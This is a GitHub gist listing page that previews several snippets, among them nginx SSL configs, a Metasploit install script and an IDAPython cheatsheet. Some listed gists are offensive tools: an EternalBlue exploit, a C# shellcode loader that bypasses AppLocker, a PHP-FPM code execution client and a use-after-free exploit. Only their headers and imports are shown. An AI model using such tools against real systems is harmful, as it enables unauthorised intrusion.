Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

soxfmr

🎯
Focusing
  • /dev/null
View GitHub Profile
@2XXE-SRA
2XXE-SRA / netrelease.ps1
Last active May 27, 2021
Add user to LanmanServer SrvsvcSessionInfo DACL, allowing them to perform NetSessionEnum (e.g. NetSess, BloodHound)
View netrelease.ps1
# based on NetCease: https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dcb5b
# can be deployed on a per-host basis using this script - e.g. via something like SCCM
# or, once deployed to one host, can be deployed via GPO Registry preferences by copying the set registry value
# (lanmanserver still needs to be restarted when done this way)
# see: https://adsecurity.org/?p=3299 -> Disable Windows Legacy & Typically Unused Features -> Disable Net Session Enumeration (NetCease)
# constants
$key = "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity"
$name = "SrvsvcSessionInfo"
View userafterfree_exploit.py
from socket import *
import struct
controller = None
puppet = None
class ChatClient:
def __init__(self, server):
self._server = server
self._sock = socket(AF_INET, SOCK_STREAM, 0)
@icecr4ck
icecr4ck / idapython_cheatsheet.md
Last active Jan 27, 2022
Cheatsheet for IDAPython
View idapython_cheatsheet.md
@netbiosX
netbiosX / Shellcode.cs
Created Jun 6, 2017
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@minkione
minkione / msf_install.sh
Created May 22, 2017
Install metasploit on Debian 8
View msf_install.sh
# Install Oracle Java 8
apt-get install software-properties-common
add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" && apt-get update
apt-get install oracle-java8-installer
# Installing Dependencies
apt-get update
apt-get upgrade
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
@worawit
worawit / eternalblue7_exploit.py
Last active Sep 6, 2021
Eternalblue exploit for Windows 7/2008
View eternalblue7_exploit.py
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@phith0n
phith0n / fpm.py
Last active Jan 13, 2022
Fastcgi PHP-FPM Client && Code Execution
View fpm.py
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
@nrollr
nrollr / nginx.conf
Last active Jan 17, 2022
NGINX config for SSL with Let's Encrypt certs
View nginx.conf
# UPDATED 17 February 2019
# Redirect all HTTP traffic to HTTPS
server {
listen 80;
listen [::]:80;
server_name www.domain.com domain.com;
return 301 https://$host$request_uri;
}
# SSL configuration
View alictf-decrypt.py
import base64
from Crypto.Cipher import AES
from Crypto import Random
# pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
# unpad = lambda s : s[:-ord(s[len(s)-1:])
KEY = "58897d583d888978b62469889d584472"
PW = "XIANJIAN "
@cecilemuller
cecilemuller / letsencrypt_2020.md
Last active Jan 22, 2022
How to setup Let's Encrypt for Nginx on Ubuntu 18.04 (including IPv6, HTTP/2 and A+ SSL rating)
View letsencrypt_2020.md

How to setup Let's Encrypt for Nginx on Ubuntu 18.04 (including IPv6, HTTP/2 and A+ SLL rating)


Virtual hosts

Let's say you want to host domains first.com and second.com.

Create folders for their files: